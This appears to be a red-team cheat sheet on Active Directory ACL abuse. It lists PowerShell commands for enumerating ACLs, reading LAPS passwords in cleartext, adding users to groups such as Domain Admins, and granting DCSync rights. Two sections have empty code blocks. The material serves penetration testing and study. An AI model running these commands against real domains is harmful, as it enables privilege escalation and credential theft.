# ACL Abuse ## Enumeration {% tabs %} {% tab title="ADModule" %} ``` # Import Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1 # Get DistinguishedName Get-ADUser -Identity USER # Find ACLs related to that user (Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access ``` {% endtab %} {% tab title="PowerView\_Dev" %} ``` Find-InterestingDomainACL -ResolveGUIDs ``` {% endtab %} {% tab title="PowerView" %} ``` Invoke-ACLScanner -ResolveGUIDs ``` {% endtab %} {% endtabs %} ## ReadProperty, ExtendedRight over OU / Computer Object Most likely LAPS. The IdentityReferenceName can read the LAPS password in cleartext for the OU. {% tabs %} {% tab title="LAPS Module" %} ``` # Import module Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 # Find the OUs that can read LAPS passwords Find-AdmPwdExtendedRights -Identity # Once we have compromised a user that can read LAPS Get-AdmPwdPassword -ComputerName ``` {% endtab %} {% endtabs %} ## WriteProperty | Self-Membership | GenericAll over Group Can add members to the group {% tabs %} {% tab title="ADModule" %} ``` # Add Add-ADGroupMember -Identity "LocalAdmins" -Members USERS # Check Get-ADGroupMember -Identity "LocalAdmins" ``` {% endtab %} {% tab title="PowerView\_dev" %} ``` Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' ``` {% endtab %} {% endtabs %} ## GenericWrite | GenericAll | WriteProperty over Computer Object Can perform Resource Based Constrained Delegation Attack ``` ``` ## GenericAll over User Object Can reset their password without knowing the old one ``` ``` ## WriteDACL over DC Can give DCSync privs to user {% tabs %} {% tab title="RACE" %} ``` Set-ADACL -SamAccountName USER\DOMAIN DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose ``` {% endtab %} {% tab title="PowerView3" %} ``` Add-DomainObjectAcl -PrincipalIdentity USER -Rights DCSync ``` {% endtab %} {% endtabs %} ## Resources {% embed url="" %}